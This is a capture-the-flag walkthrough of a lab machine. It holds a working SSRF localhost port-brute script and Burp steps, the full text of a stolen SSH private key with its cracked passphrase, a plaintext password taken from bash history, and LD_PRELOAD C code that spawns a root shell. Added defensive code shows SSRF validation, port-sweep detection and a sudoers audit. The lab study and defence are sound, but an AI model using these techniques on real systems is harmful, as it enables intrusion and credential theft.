Creative
did an nmap scan
saw ssh port 22 open
put "10.10.161.74 creative.thm" in /etc/hosts (sudo nano /etc/hosts)
did a gobuster vhost scan because robots.txt and the page source don't have anything juicy
gobuster vhost -u http://creative.thm/ -w /usr/share/wordlists/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 40
we found a beta.creative.thm
in /etc/hosts (sudo nano /etc/hosts) we add "10.10.161.74 beta.creative.thm"
in Firefox we opened beta.creative.thm and found a URL tester page
The URL Tester Works!!!!!!
It gives Dead when we search for Google (because THM machines don’t have access to Google)
also when we host our own server using
python -m http.server 80
and access it via the URL tester as http://<mcn ip>/test.html
we get the contents of the test file
This might lead to an SSRF attack
Server-Side Request Forgery (SSRF) is a type of security vulnerability that lets an attacker make a vulnerable server send crafted requests to internal or external resources. In an SSRF attack the attacker manipulates the server into making requests to unintended locations, which can lead to various security issues.
SSRF vulnerabilities typically arise when an application accepts user input and uses it to construct a URL for an HTTP request without proper validation or sanitization. For example:
- A web application allows users to specify a URL to fetch data from and then uses that URL to make a request. If the application does not validate the input properly, an attacker can supply a URL that points to an internal service (here: localhost on the box behind the URL tester).
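As an added defender-side example (this is not code from the room or from this writeup), below is the kind of validation the URL tester is missing: scheme, host allowlist, port allowlist, and a check that every address the host resolves to is public. The allowlist names, the ports, and the fake resolver table are assumptions made up for the demo; the real fetcher would use `system_resolver`.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed allowlist (constructed): the only hosts this fetcher is meant to reach.
ALLOWED_HOSTS = {"example.com", "partner.example.com"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def system_resolver(hostname):
    """Resolve a name to all of its addresses (IPv4 and IPv6) with the OS resolver."""
    try:
        infos = socket.getaddrinfo(hostname, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def fake_resolver(hostname):
    """Constructed lookup table for the offline demo. partner.example.com deliberately
    maps to a private address, as a misconfigured or rebound DNS record would."""
    table = {"example.com": ["93.184.216.34"], "partner.example.com": ["10.0.0.5"]}
    return [ipaddress.ip_address(a) for a in table.get(hostname, [])]


def is_safe_fetch_url(url, resolver=system_resolver):
    """Return (ok, reason). Anything that is not explicitly allowed is rejected."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"          # blocks file://, gopher://, etc.
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"          # user@host tricks
    if host.lower() not in ALLOWED_HOSTS:
        return False, "host not on allowlist"       # 127.0.0.1, localhost, 169.254.x, ...
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:                              # non-numeric or out-of-range port
        return False, "port not allowed"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"            # no port sweeping through the fetcher
    # Resolve and check every address: an allowlisted name can still point inward.
    try:
        addrs = [ipaddress.ip_address(host)]        # literal IP, nothing to resolve
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not addr.is_global:                      # loopback, RFC1918, link-local, ...
            return False, f"resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://example.com/data",
                      "http://127.0.0.1:1337/home",
                      "https://partner.example.com/report"):
        print(candidate, is_safe_fetch_url(candidate, resolver=fake_resolver))
```

Two things the validator alone does not cover: the fetcher must connect to the address it just checked (resolving a second time reopens the DNS rebinding window) and must not follow redirects, otherwise an allowlisted host can bounce the request to 127.0.0.1:1337 anyway.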
made a python file (portbrute.py)
```python
import requests
from concurrent.futures import ThreadPoolExecutor


def send_post_request(url, payload, headers):
    try:
        response = requests.post(url, data=payload, headers=headers)
        content_length = response.headers.get('Content-Length')
        # 13 bytes is the baseline response length for an unreachable port; print anything else
        if content_length != '13':
            print(f"POST request to {url} with payload {payload} returned status code: {response.status_code}, content length: {content_length}")
    except requests.exceptions.RequestException as e:
        print(f"Error sending POST request: {e}")


def main():
    base_url = "http://beta.creative.thm"
    headers = {
        "Host": "beta.creative.thm",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://beta.creative.thm",
        "Connection": "close",
        "Referer": "http://beta.creative.thm/",
        "Upgrade-Insecure-Requests": "1"
    }
    # Using ThreadPoolExecutor to run 20 threads concurrently
    with ThreadPoolExecutor(max_workers=20) as executor:
        for port_number in range(1, 65536):
            # the URL tester takes the target in the url= form field, URL-encoded
            payload = f"url=http%3A%2F%2Flocalhost%3A{port_number}"
            executor.submit(send_post_request, base_url, payload, headers)


if __name__ == "__main__":
    main()
```
and run it as python portbrute.py
or use Burp Suite in Intruder mode
turn on the proxy and intercept
enter http://127.0.0.1:80/ in the website
we get
```http
§POST / HTTP/1.1
Host: beta.creative.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://beta.creative.thm
Connection: close
Referer: http://beta.creative.thm/
Upgrade-Insecure-Requests: 1

url=http%3A%2F%2F10.10.49.236§
```
ctrl+a → ctrl+i (send to Intruder)
change the payload position to url=127.0.0.1:§80§/
go to the Payloads section (generate a payload list in the pentesters GPT using the prompt "can you give me top ports in new-line so that i can paste it in the payload section of Burpsuite")
paste the list in the payload window, go back to Intruder and "Start attack"
on port 1337 we get a status 200
now put http://127.0.0.1:1337/ and intercept that
Send that to Repeater
in url=http%3a%2f%2f127.0.0.1%3a80%2f select "http%3a%2f%2f127.0.0.1%3a80%2f", decode it, change it to "http://127.0.0.1:1337/", encode it again and paste the encoded text back as
url=http%3a%2f%2f127.0.0.1%3a1337%2f and send it
status 200 achieved
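From the other side of the wire: an SSRF port sweep like the one above (a script or Intruder walking through localhost ports) is easy to spot if the URL tester logs what it fetches. This is an added detection example, not from the room or the writeup; the log format (timestamp, client, target, result) and the sample lines are constructed for the demo, and DNS names are left unclassified since no resolution is attempted offline.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample lines in an assumed application log format: one client walks
# through loopback ports, a second client makes two unrelated requests.
SAMPLE_LOG = """\
2024-05-01T10:00:00 client=10.10.49.236 target=http://www.google.com/ result=dead
2024-05-01T10:00:05 client=10.10.49.236 target=http://127.0.0.1:21/ result=dead
2024-05-01T10:00:05 client=10.10.49.236 target=http://127.0.0.1:22/ result=dead
2024-05-01T10:00:06 client=10.10.49.236 target=http://127.0.0.1:80/ result=dead
2024-05-01T10:00:06 client=10.10.49.236 target=http://127.0.0.1:443/ result=dead
2024-05-01T10:00:07 client=10.10.49.236 target=http://127.0.0.1:1337/ result=alive
2024-05-01T10:00:08 client=10.10.49.236 target=http://127.0.0.1:8080/ result=dead
2024-05-01T10:30:00 client=192.168.1.20 target=http://127.0.0.1:80/ result=dead
2024-05-01T10:31:00 client=192.168.1.20 target=http://example.com/ result=alive
"""


def parse_line(line):
    """Split one log line into (timestamp, client, target URL, result)."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split(" "))
    return datetime.fromisoformat(ts), fields["client"], fields["target"], fields["result"]


def is_internal_target(url):
    """True if the target host is localhost or a literal non-public IP address."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    if host.lower() == "localhost":
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # a DNS name: would need resolution, not attempted here


def find_internal_port_sweeps(log_text, window_seconds=300, min_ports=5):
    """Return {client: {"ports": [...], "alive": [...]}} for every client that asked
    the fetcher for at least min_ports distinct internal ports within the window."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, target, result = parse_line(line)
        if is_internal_target(target):
            parts = urlsplit(target)
            port = parts.port or (443 if parts.scheme == "https" else 80)
            events[client].append((ts, port, result))

    alerts = {}
    for client, evs in events.items():
        evs.sort()
        start, flagged = 0, set()
        for end in range(len(evs)):           # sliding time window over ordered events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            window_ports = {p for _, p, _ in evs[start:end + 1]}
            if len(window_ports) >= min_ports:
                flagged |= window_ports
        if flagged:
            alerts[client] = {
                "ports": sorted(flagged),
                # the ports that answered are the ones actually exposed through the SSRF
                "alive": sorted({p for _, p, r in evs if r == "alive" and p in flagged}),
            }
    return alerts


if __name__ == "__main__":
    for client, info in find_internal_port_sweeps(SAMPLE_LOG).items():
        print(f"{client}: swept {len(info['ports'])} internal ports, alive: {info['alive']}")
```

The threshold and window are tunable; the point is that a single client touching many distinct loopback ports through the fetcher is not normal use of a URL tester, and the "alive" list tells the responder which internal service (here the one on 1337) the attacker has reached.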
now again encode "http://127.0.0.1:1337/home" and send
we get a name: saad
encode "http://127.0.0.1:1337/home/saad/" and send
we get .ssh
encode "http://127.0.0.1:1337/home/saad/.ssh/" and send
we get id_rsa
encode "http://127.0.0.1:1337/home/saad/.ssh/id_rsa/" and send
we get the private key
```
-----BEGIN OPENSSH PRIVATE KEY-----
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
ksrXEYjaMdndnvxBZ0zi9T+ywag=
-----END OPENSSH PRIVATE KEY-----
```
save it as id_rsa (plain text)
💡 add one empty line (a trailing newline) at the end of the file to prevent the "authentication error"
sudo chmod 600 id_rsa
ssh -i id_rsa saad@10.10.73.100 → it says the key is protected (passphrase), so we use john
ssh2john id_rsa > hash
found it!!!!!!!!!!!!!!! the passphrase is sweetness (id_rsa)
ssh -i id_rsa saad@10.10.73.100 ………………. now when it asks for the passphrase enter "sweetness"
cat .bash_history
the password is in
```
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
```
password is MyStrongestPasswordYet$4291
```
saad@m4lware:~$ sudo -l
[sudo] password for saad:
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping
```
env_keep+=LD_PRELOAD means sudo passes our LD_PRELOAD through to the root command, so the loader will load any .so we name before ping even starts
search for LD_PRELOAD priv esc and find this code
```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid/setgid prototypes */

/* _init runs when the shared object is loaded (built with -nostartfiles),
   i.e. before main() of the sudo'd program */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the shell too */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
```
then cd /tmp/, create a file like nano shell.c and paste the above code
then run gcc -fPIC -shared -o shell.so shell.c -nostartfiles
then run sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
sudo access granted!!!!!!!!!!
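For the fix side: the whole escalation hinges on one sudoers line, `Defaults env_keep += LD_PRELOAD`. sudo's env_reset already strips the dynamic-loader variables, so the cure is simply to delete that line (edit with visudo) and then check no file under /etc/sudoers.d re-adds it. The audit script below is an added example, not from the room or the writeup; the two sudoers snippets are constructed, the weak one mirroring the `sudo -l` output above.

```python
import re

# Loader-controlled variables that must never survive into a sudo'd command.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Constructed sample: the weak configuration (LD_PRELOAD is kept across sudo).
WEAK_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
Defaults        env_keep += LD_PRELOAD
saad    ALL=(root) /usr/bin/ping
"""

# Constructed sample: the hardened configuration, the env_keep line removed.
FIXED_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
saad    ALL=(root) /usr/bin/ping
"""

ENV_KEEP_RE = re.compile(r'\benv_keep\s*(\+=|-=|=)\s*(.*)$')


def find_loader_env_keep(sudoers_text):
    """Return [(line_no, variable)] for every Defaults env_keep entry that preserves a
    loader variable. Handles quoted lists ("A B"), unquoted single values, and the
    Defaults:user / Defaults!cmd / Defaults@host forms; '-=' removals are ignored."""
    findings = []
    for line_no, raw in enumerate(sudoers_text.splitlines(), 1):
        line = raw.split("#", 1)[0]            # drop trailing comments
        if not line.lstrip().startswith("Defaults"):
            continue
        m = ENV_KEEP_RE.search(line)
        if not m or m.group(1) == "-=":
            continue
        for var in m.group(2).strip().strip('"').split():
            if var in LOADER_VARS:
                findings.append((line_no, var))
    return findings


def is_sudoers_safe(sudoers_text):
    """Convenience wrapper: True when no loader variable is kept."""
    return not find_loader_env_keep(sudoers_text)


if __name__ == "__main__":
    for name, text in (("weak", WEAK_SUDOERS), ("fixed", FIXED_SUDOERS)):
        print(name, find_loader_env_keep(text) or "clean")
```

On a real box run it over /etc/sudoers and every file in /etc/sudoers.d (you need root to read them), and confirm with `sudo -l` afterwards that the Defaults block no longer lists env_keep+=LD_PRELOAD.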
cat root.txt
cat /home/saad/user.txt
Kistimaat!!!!!!!!!!!